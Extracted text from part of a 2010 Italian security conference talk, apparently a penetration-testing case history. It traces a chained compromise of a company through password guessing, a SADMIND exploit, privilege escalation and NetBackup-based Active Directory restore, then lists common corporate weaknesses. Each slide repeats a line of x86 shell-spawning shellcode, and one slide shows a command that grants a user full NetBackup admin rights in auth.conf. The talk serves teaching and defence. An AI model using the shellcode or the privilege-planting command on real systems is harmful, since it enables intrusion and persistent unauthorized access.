\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 53
vulnerabilità aziendali - case history
!
0wned Domain
chained exploit, lotek edition
Password Guessing
SADMIND Exploit
LocalPrivilege
Escalation
Srv Enable
echo “falsema ADMIN=ALL JBP=ALL” >> /nbudb/openv/java/auth.conf
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 54
vulnerabilità aziendali - case history
!
0wned Domain
chained exploit, lotek edition
Password Guessing
SADMIND Exploit
LocalPrivilege
Escalation
Srv Enable
NetbackupAdministration
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 55
vulnerabilità aziendali - case history
!
0wned Domain
chained exploit, lotek edition
Password Guessing
SADMIND Exploit
LocalPrivilege
Escalation
Srv Enable
NetbackupAdministration
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 56
vulnerabilità aziendali - case history
!
0wned Domain
chained exploit, lotek edition
Password Guessing
SADMIND Exploit
LocalPrivilege
Escalation
Srv Enable
NetbackupAdministration
Software
Leech
Windows 2003 server R2 32bit edition
Netbackup 5.1 install + patch
Win2003
VM
AD
half restore
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 57
vulnerabilità aziendali - case history
!
0wned Domain
chained exploit, lotek edition
Password Guessing
SADMIND Exploit
LocalPrivilege
Escalation
Srv Enable
NetbackupAdministration
Software
Leech
Win2003
VM
AD
half restore
restore del server AD di backup
reinstallazione driver
installazione servizio nel registro
creazione di utenza di dominio
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 58
vulnerabilità aziendali - case history
!
0wned Domain
chained exploit, lotek edition
Password Guessing
SADMIND Exploit
LocalPrivilege
Escalation
Srv Enable
NetbackupAdministration
Software
Leech
Win2003
VM
AD
half restoreAD
corruption
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 59
vulnerabilità aziendali - considerazioni
misconfiguration / hardening
logica client side
web input validation
buffer overflow
10 anni fa oggi
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 60
vulnerabilità aziendali - considerazioni
pt esterno
applicazioni web
proprietarie (circa 4 su 5)
configurazioni errate
password
niente più NFS/NIS/FTP/SMB/CIFS
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 61
vulnerabilità aziendali - considerazioni
pt esterno
applicazioni web
proprietarie (circa 4 su 5)
configurazioni errate
password
niente più NFS/NIS/FTP/SMB/CIFS
pt interno
password
problemi derivanti dalla gestione logica delle risorse IT
eterogeneità architetture / piattaforme
complessità gestione policy
differenti organigrammi, differenti responsabilità
\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 62
0wning the Business, ReloadedMatteo Falsetti - mfalsetti[at]enforcer.it - fusys[at]sikurezza.org
le immagini del fumetto Dilbert e del progetto Metasploit sono di proprietà dei rispettivi autori
Domande?